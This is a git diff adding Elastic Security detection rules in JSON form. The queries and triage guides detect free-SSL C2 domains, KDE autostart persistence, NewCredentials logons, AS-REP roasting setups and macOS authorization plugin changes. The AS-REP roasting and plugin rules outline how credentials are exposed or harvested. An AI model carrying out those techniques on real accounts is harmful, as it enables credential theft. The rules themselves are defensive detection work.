b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_107.json new file mode 100644 index 00000000000..22028f5f21e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_107.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual processes connecting to domains using known free SSL certificates. Adversaries may employ a known encryption algorithm to conceal command and control traffic.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.network-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to Commonly Abused Free SSL Certificate Providers", + "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n /* Add new free SSL certificate provider domains here */\n dns.question.name : (\"*letsencrypt.org\", \"*.sslforfree.com\", \"*.zerossl.com\", \"*.freessl.org\") and\n\n /* Native Windows process paths that are unlikely to have network connections to domains secured using free SSL certificates */\n process.executable : (\"C:\\\\Windows\\\\System32\\\\*.exe\",\n \"C:\\\\Windows\\\\System\\\\*.exe\",\n\t \"C:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\explorer.exe\",\n\t\t \"C:\\\\Windows\\\\notepad.exe\") and\n\n /* Insert noisy false positives here */\n not process.name : (\"svchost.exe\", \"MicrosoftEdge*.exe\", \"msedge.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1573", + "name": "Encrypted Channel", + "reference": "https://attack.mitre.org/techniques/T1573/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_110.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_110.json new file mode 100644 index 00000000000..b44bd881c83 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_110.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a K Desktop Environment (KDE) AutoStart script or desktop file that will execute upon each user logon. Adversaries may abuse this method for persistence.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via KDE AutoStart Script or Desktop File Modification", + "note": "## Triage and analysis\n\n### Investigating Persistence via KDE AutoStart Script or Desktop File Modification\n\nK Desktop Environment (KDE) is a popular graphical desktop environment for Linux systems. It supports AutoStart scripts and desktop files that execute automatically upon user logon.\n\nAdversaries may exploit this feature to maintain persistence on a compromised system by creating or modifying these files.\n\nThe detection rule 'Persistence via KDE AutoStart Script or Desktop File Modification' is designed to identify such activities by monitoring file events on Linux systems. It specifically targets the creation or modification of files with extensions \".sh\" or \".desktop\" in various AutoStart directories. By detecting these events, the rule helps security analysts identify potential abuse of KDE AutoStart functionality by malicious actors.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n### Possible investigation steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\n path LIKE '/home/%/.config/autostart/%.sh' OR path LIKE '/home/%/.config/autostart/%.desktop' OR\\n path LIKE '/root/.config/autostart/%.sh' OR path LIKE '/root/.config/autostart/%.desktop' OR\\n path LIKE '/home/%/.kde/Autostart/%.sh' OR path LIKE '/home/%/.kde/Autostart/%.desktop' OR\\n path LIKE '/root/.kde/Autostart/%.sh' OR path LIKE '/root/.kde/Autostart/%.desktop' OR\\n path LIKE '/home/%/.kde4/Autostart/%.sh' OR path LIKE '/home/%/.kde4/Autostart/%.desktop' OR\\n path LIKE '/root/.kde4/Autostart/%.sh' OR path LIKE '/root/.kde4/Autostart/%.desktop' OR\\n path LIKE '/home/%/.kde/share/autostart/%.sh' OR path LIKE '/home/%/.kde/share/autostart/%.desktop' OR\\n path LIKE '/root/.kde/share/autostart/%.sh' OR path LIKE '/root/.kde/share/autostart/%.desktop' OR\\n path LIKE '/home/%/.kde4/share/autostart/%.sh' OR path LIKE '/home/%/.kde4/share/autostart/%.desktop' OR\\n path LIKE '/root/.kde4/share/autostart/%.sh' OR path LIKE '/root/.kde4/share/autostart/%.desktop' OR\\n path LIKE '/home/%/.local/share/autostart/%.sh' OR path LIKE '/home/%/.local/share/autostart/%.desktop' OR\\n path LIKE '/root/.local/share/autostart/%.sh' OR path LIKE '/root/.local/share/autostart/%.desktop' OR\\n path LIKE '/home/%/.config/autostart-scripts/%.sh' OR path LIKE '/home/%/.config/autostart-scripts/%.desktop' OR\\n path LIKE '/root/.config/autostart-scripts/%.sh' OR path LIKE '/root/.config/autostart-scripts/%.desktop' OR\\n path LIKE '/etc/xdg/autostart/%.sh' OR path LIKE '/etc/xdg/autostart/%.desktop' OR\\n path LIKE '/usr/share/autostart/%.sh' OR path LIKE '/usr/share/autostart/%.desktop'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\n path LIKE '/home/%/.config/autostart/%.sh' OR path LIKE '/home/%/.config/autostart/%.desktop' OR\\n path LIKE '/root/.config/autostart/%.sh' OR path LIKE '/root/.config/autostart/%.desktop' OR\\n path LIKE '/home/%/.kde/Autostart/%.sh' OR path LIKE '/home/%/.kde/Autostart/%.desktop' OR\\n path LIKE '/root/.kde/Autostart/%.sh' OR path LIKE '/root/.kde/Autostart/%.desktop' OR\\n path LIKE '/home/%/.kde4/Autostart/%.sh' OR path LIKE '/home/%/.kde4/Autostart/%.desktop' OR\\n path LIKE '/root/.kde4/Autostart/%.sh' OR path LIKE '/root/.kde4/Autostart/%.desktop' OR\\n path LIKE '/home/%/.kde/share/autostart/%.sh' OR path LIKE '/home/%/.kde/share/autostart/%.desktop' OR\\n path LIKE '/root/.kde/share/autostart/%.sh' OR path LIKE '/root/.kde/share/autostart/%.desktop' OR\\n path LIKE '/home/%/.kde4/share/autostart/%.sh' OR path LIKE '/home/%/.kde4/share/autostart/%.desktop' OR\\n path LIKE '/root/.kde4/share/autostart/%.sh' OR path LIKE '/root/.kde4/share/autostart/%.desktop' OR\\n path LIKE '/home/%/.local/share/autostart/%.sh' OR path LIKE '/home/%/.local/share/autostart/%.desktop' OR\\n path LIKE '/root/.local/share/autostart/%.sh' OR path LIKE '/root/.local/share/autostart/%.desktop' OR\\n path LIKE '/home/%/.config/autostart-scripts/%.sh' OR path LIKE '/home/%/.config/autostart-scripts/%.desktop' OR\\n path LIKE '/root/.config/autostart-scripts/%.sh' OR path LIKE '/root/.config/autostart-scripts/%.desktop' OR\\n path LIKE '/etc/xdg/autostart/%.sh' OR path LIKE '/etc/xdg/autostart/%.desktop' OR\\n path LIKE '/usr/share/autostart/%.sh' OR path LIKE '/usr/share/autostart/%.desktop'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses cron jobs for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"linux\" and event.type != \"deletion\" and\n file.extension in (\"sh\", \"desktop\") and\n file.path :\n (\n \"/home/*/.config/autostart/*\", \"/root/.config/autostart/*\",\n \"/home/*/.kde/Autostart/*\", \"/root/.kde/Autostart/*\",\n \"/home/*/.kde4/Autostart/*\", \"/root/.kde4/Autostart/*\",\n \"/home/*/.kde/share/autostart/*\", \"/root/.kde/share/autostart/*\",\n \"/home/*/.kde4/share/autostart/*\", \"/root/.kde4/share/autostart/*\",\n \"/home/*/.local/share/autostart/*\", \"/root/.local/share/autostart/*\",\n \"/home/*/.config/autostart-scripts/*\", \"/root/.config/autostart-scripts/*\",\n \"/etc/xdg/autostart/*\", \"/usr/share/autostart/*\"\n ) and\n not process.name in (\"yum\", \"dpkg\", \"install\", \"dnf\", \"teams\", \"yum-cron\", \"dnf-automatic\", \"docker\", \"dockerd\", \n \"rpm\", \"pacman\", \"podman\", \"nautilus\", \"remmina\", \"cinnamon-settings.py\")\n", + "references": [ + "https://userbase.kde.org/System_Settings/Autostart", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", + "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_2.json b/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_2.json new file mode 100644 index 00000000000..9fe3c69cda5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_2.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a new credentials logon type performed by an unusual process. This may indicate the existence of an access token forging capability that are often abused to bypass access control restrictions.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen NewCredentials Logon Process", + "new_terms_fields": [ + "process.executable" + ], + "query": "event.category:\"authentication\" and host.os.type:\"windows\" and winlog.logon.type:\"NewCredentials\" and winlog.event_data.LogonProcessName:(Advapi* or \"Advapi \") and not winlog.event_data.SubjectUserName:*$ and not process.executable :???\\\\Program?Files*\n", + "references": [ + "https://www.elastic.co/pt/blog/how-attackers-abuse-access-token-manipulation" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.LogonProcessName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "e468f3f6-7c4c-45bb-846a-053738b3fe5d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.001", + "name": "Token Impersonation/Theft", + "reference": "https://attack.mitre.org/techniques/T1134/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "e468f3f6-7c4c-45bb-846a-053738b3fe5d_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_110.json b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_110.json new file mode 100644 index 00000000000..8b612824c24 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e514d8cd-ed15-4011-84e2-d15147e059f1_110.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of an account's Kerberos pre-authentication options. An adversary with GenericWrite/GenericAll rights over the account can maliciously modify these settings to perform offline password cracking attacks such as AS-REP roasting.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kerberos Pre-authentication Disabled for User", + "note": "## Triage and analysis\n\n### Investigating Kerberos Pre-authentication Disabled for User\n\nKerberos pre-authentication is an account protection against offline password cracking. When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user\u2019s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user\u2019s password. Microsoft's security monitoring [recommendations](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738) state that `'Don't Require Preauth' \u2013 Enabled` should not be enabled for user accounts because it weakens security for the account\u2019s Kerberos authentication.\n\nAS-REP roasting is an attack against Kerberos for user accounts that do not require pre-authentication, which means that if the target user has pre-authentication disabled, an attacker can request authentication data for it and get a TGT that can be brute-forced offline, similarly to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Determine if the target account is sensitive or privileged.\n- Inspect the account activities for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- Disabling pre-authentication is a bad security practice and should not be allowed in the domain. The security team should map and monitor any potential benign true positives (B-TPs), especially if the target account is privileged.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Reset the target account's password if there is any risk of TGTs having been retrieved.\n- Re-enable the preauthentication option or disable the target account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.code:4738 and winlog.api:\"wineventlog\" and message:\"'Don't Require Preauth' - Enabled\"\n", + "references": [ + "https://harmj0y.medium.com/roasting-as-reps-e6179a65216b", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0026_windows_audit_user_account_management.md" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": false, + "name": "winlog.api", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", + "setup": "## Setup\n\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/", + "subtechnique": [ + { + "id": "T1558.004", + "name": "AS-REP Roasting", + "reference": "https://attack.mitre.org/techniques/T1558/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "e514d8cd-ed15-4011-84e2-d15147e059f1_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_106.json b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_106.json new file mode 100644 index 00000000000..bc6e2f6f309 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_106.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Authorization plugins are used to extend the authorization services API and implement mechanisms that are not natively supported by the OS, such as multi-factor authentication with third party software. Adversaries may abuse this feature to persist and/or collect clear text credentials as they traverse the registered plugins during user logon.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Authorization Plugin Modification", + "query": "event.category:file and host.os.type:macos and not event.type:deletion and\n file.path:(/Library/Security/SecurityAgentPlugins/* and\n not /Library/Security/SecurityAgentPlugins/TeamViewerAuthPlugin.bundle/*) and\n not process.name:shove and process.code_signature.trusted:true\n", + "references": [ + "https://developer.apple.com/documentation/security/authorization_plug-ins", + "https://www.xorrior.com/persistent-credential-theft/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e6c98d38-633d-4b3e-9387-42112cd5ac10", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.002", + "name": "Authentication Package", + "reference": "https://attack.mitre.org/techniques/T1547/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "e6c98d38-633d-4b3e-9387-42112cd5ac10_106", + "type": "security-rule" +} \ 